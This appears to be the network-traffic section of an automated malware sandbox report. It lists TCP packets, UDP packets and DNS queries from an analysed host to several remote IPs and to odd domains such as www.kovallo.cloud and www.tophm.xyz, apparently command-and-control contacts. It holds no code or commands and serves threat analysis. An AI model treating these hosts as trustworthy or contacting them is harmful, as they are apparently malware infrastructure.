                                                    Oct 9, 2024 14:02:33.171226978 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.171272993 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.171284914 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.171319962 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.171421051 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.171432972 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.171472073 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.172147989 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.172158957 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.172169924 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.172194958 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.172261000 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.172272921 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.172305107 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.173144102 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.173192978 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.173274994 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.214041948 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.237853050 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.237898111 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.237910032 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.237946987 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.237958908 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.237972021 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.237996101 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.238032103 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.238409996 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.238456964 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.238470078 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.238507986 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.238604069 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.238615990 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.238626957 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.238662958 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.238679886 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.239327908 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.239907980 CEST804998644.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:33.239957094 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:33.245345116 CEST4998680192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:34.265245914 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:34.270163059 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:34.270308018 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:34.282876015 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:34.287844896 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:34.287997961 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.483587980 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.483954906 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.484019041 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.484050035 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.484061956 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.484136105 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.498430014 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.498462915 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.498478889 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.498543024 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.498645067 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.498660088 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.498675108 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.498689890 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.498699903 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.498706102 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.498728037 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.498753071 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.498944044 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.498956919 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.498997927 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.571532011 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.571598053 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.571634054 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.571724892 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.571774960 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.571870089 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.571870089 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.586078882 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.586148024 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.586183071 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.586302042 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.586335897 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.586405993 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.586472988 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.586518049 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.586519957 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.586553097 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.586580992 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.586662054 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.586714029 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.586740971 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.587362051 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.587415934 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.587433100 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.587466955 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.587512016 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.587532043 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.587598085 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.587641954 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.588264942 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.588318110 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.588351011 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.588366985 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.588423967 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.588470936 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.658930063 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.658998966 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.659049988 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.659085035 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.659120083 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.659184933 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.659292936 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.686826944 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.686852932 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.686868906 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.686892986 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.686908960 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.686923027 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.686938047 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.686935902 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.686952114 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.686966896 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.686970949 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.686983109 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.687004089 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.687014103 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.687208891 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.687225103 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.687238932 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.687247992 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.687252998 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.687268972 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.687278032 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.687308073 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691463947 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691490889 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691507101 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691523075 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691539049 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691555977 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691601038 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691631079 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691647053 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691797018 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691813946 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691874027 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691884041 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691890001 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691905975 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691922903 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691924095 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691939116 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691946030 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691953897 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691977978 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.745229959 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.746679068 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.746757030 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.746795893 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.746831894 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.747347116 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747405052 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.747423887 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747459888 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747493029 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747513056 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.747526884 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747560024 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747565031 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.747594118 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747631073 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774141073 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774243116 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774267912 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774282932 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774297953 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774313927 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774328947 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774331093 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774343967 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774359941 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774373055 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774374962 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774389029 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774405003 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774418116 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774465084 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774782896 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774810076 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774826050 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774851084 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774930000 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774945021 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774960995 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774975061 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.775003910 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.775744915 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.775890112 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.775914907 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.775930882 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.776060104 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776074886 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776092052 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776104927 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.776134014 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.776823997 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776840925 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776856899 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776989937 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.777123928 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777139902 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777154922 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777173996 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.777209997 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.777601004 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777746916 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777762890 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777777910 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777791977 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.777795076 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777820110 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.777892113 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777937889 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.778692007 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.778712988 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.778733969 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.778760910 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.778837919 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.778881073 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.792689085 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:36.811815023 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:36.817272902 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:36.817398071 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:36.824409008 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:36.829931021 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:37.982923985 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:38.003098011 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:38.003123999 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:38.003283024 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:38.004648924 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:38.005978107 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:38.010883093 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:43.273756027 CEST4998980192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:43.278983116 CEST8049989217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:43.279318094 CEST4998980192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:43.294836998 CEST4998980192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:43.299689054 CEST8049989217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:44.031128883 CEST8049989217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:44.031162024 CEST8049989217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:44.031246901 CEST4998980192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:44.807970047 CEST4998980192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:45.869112015 CEST4999080192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:45.874083996 CEST8049990217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:45.874193907 CEST4999080192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:45.892370939 CEST4999080192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:45.897308111 CEST8049990217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:46.528211117 CEST8049990217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:46.528834105 CEST8049990217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:46.528894901 CEST4999080192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:47.401705980 CEST4999080192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:48.447841883 CEST4999180192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:48.452819109 CEST8049991217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:48.452943087 CEST4999180192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:48.490209103 CEST4999180192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:48.495398045 CEST8049991217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:48.495512009 CEST8049991217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:49.191828012 CEST8049991217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:49.191979885 CEST8049991217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:49.192197084 CEST4999180192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:49.995743990 CEST4999180192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.033441067 CEST4999280192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.040519953 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:51.040649891 CEST4999280192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.068710089 CEST4999280192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.076180935 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:51.703099012 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:51.703176975 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:51.703190088 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:51.703360081 CEST4999280192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.705686092 CEST4999280192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.710623026 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:56.754997969 CEST4999380192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:56.759958982 CEST8049993199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:56.760119915 CEST4999380192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:56.771025896 CEST4999380192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:56.776048899 CEST8049993199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:57.355895042 CEST8049993199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:57.356194019 CEST8049993199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:57.356326103 CEST4999380192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:58.276665926 CEST4999380192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:59.295099974 CEST4999480192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:59.300143003 CEST8049994199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:59.300282955 CEST4999480192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:59.311409950 CEST4999480192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:59.316355944 CEST8049994199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:59.899641991 CEST8049994199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:59.899924040 CEST8049994199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:59.900095940 CEST4999480192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:00.823407888 CEST4999480192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:01.844705105 CEST4999580192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:01.849735975 CEST8049995199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:01.849921942 CEST4999580192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:01.862705946 CEST4999580192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:01.868429899 CEST8049995199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:01.868446112 CEST8049995199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:02.522177935 CEST8049995199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:02.522463083 CEST8049995199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:02.522731066 CEST4999580192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:03.948591948 CEST4999580192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:04.967365980 CEST4999680192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:04.972496033 CEST8049996199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:04.972603083 CEST4999680192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:04.979829073 CEST4999680192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:04.984972954 CEST8049996199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:05.563469887 CEST8049996199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:05.563600063 CEST8049996199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:05.563664913 CEST4999680192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:05.566375971 CEST4999680192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:05.571573019 CEST8049996199.192.21.169192.168.2.9

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 9, 2024 14:01:59.807276964 CEST6145553192.168.2.91.1.1.1
                                                    Oct 9, 2024 14:01:59.860987902 CEST53614551.1.1.1192.168.2.9
                                                    Oct 9, 2024 14:02:15.592539072 CEST5058453192.168.2.91.1.1.1
                                                    Oct 9, 2024 14:02:15.676147938 CEST53505841.1.1.1192.168.2.9
                                                    Oct 9, 2024 14:02:28.999229908 CEST6253553192.168.2.91.1.1.1
                                                    Oct 9, 2024 14:02:29.162264109 CEST53625351.1.1.1192.168.2.9
                                                    Oct 9, 2024 14:02:43.022150993 CEST5356153192.168.2.91.1.1.1
                                                    Oct 9, 2024 14:02:43.271066904 CEST53535611.1.1.1192.168.2.9
                                                    Oct 9, 2024 14:02:56.722927094 CEST5212753192.168.2.91.1.1.1
                                                    Oct 9, 2024 14:02:56.752389908 CEST53521271.1.1.1192.168.2.9

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 9, 2024 14:01:59.807276964 CEST192.168.2.91.1.1.10x4d8cStandard query (0)www.kovallo.cloudA (IP address)IN (0x0001)false
                                                    Oct 9, 2024 14:02:15.592539072 CEST192.168.2.91.1.1.10x17f3Standard query (0)www.030002304.xyzA (IP address)IN (0x0001)false
                                                    Oct 9, 2024 14:02:28.999229908 CEST192.168.2.91.1.1.10x1e6bStandard query (0)www.newdaydawning.netA (IP address)IN (0x0001)false
                                                    Oct 9, 2024 14:02:43.022150993 CEST192.168.2.91.1.1.10xaf29Standard query (0)www.coffee-and-blends.infoA (IP address)IN (0x0001)false
                                                    Oct 9, 2024 14:02:56.722927094 CEST192.168.2.91.1.1.10x136eStandard query (0)www.tophm.xyzA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
